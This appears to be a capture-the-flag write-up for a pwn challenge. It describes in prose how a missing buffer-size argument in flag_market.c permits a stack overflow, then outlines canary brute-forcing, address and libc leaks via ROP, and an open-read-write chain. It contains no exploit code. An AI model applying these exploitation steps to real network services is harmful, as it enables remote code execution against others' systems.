Buffer Overflow leads to RCE
Description:
Thank you for purchasing the last flag, they are currently sold out now!
Wait, what do you mean?
I...I definitely not hiding another flag...
Tag: pwn!
Solves: 0/584
In flag_market.c card_status() function (line 84), it failed to provide atrBuf's size to atrLen as parameter.
Thus, we can forge APDU to read more than MAX_ATR_SIZE and hijack control flow.
Note that the server fork a new process for each connection, so all the information can be leaked using different connections.
- Canary
- Brute-force each byte (8 * 256 times)
- Success: received
200 OK - Failed: received
500 Internal Server Error
- Success: received
- Brute-force each byte (8 * 256 times)
- Code address
- After we have the canary, we can overwrite
RIPtocleanup()function in line 36. - Brute-force each byte (4 * 256 + 16 times)
- Success: received
500 Internal Server Error - Failed: set a timeout
- Success: received
- After we have the canary, we can overwrite
- Libc address
- With code address, we can build ROP to leak libc address from GOT
- There is a self reference pointer in BSS (
code + 0x5008), we can modify this value usingadd [rbp-0x3d], ebxgadget and jump tocode + 0x1560, which will send[code+0x5008]value to the socket fd.
- Current connection socket fd
- Use Libc address to build ROP and leak
connection_sockin bss
- Use Libc address to build ROP and leak
Finally, you can perform orw to get flag. My exploit took about 20 minutes to run :(
- https://piers-n.github.io/post/balsn-ctf-2022-writeup/
- Very detailed writeup with different leak method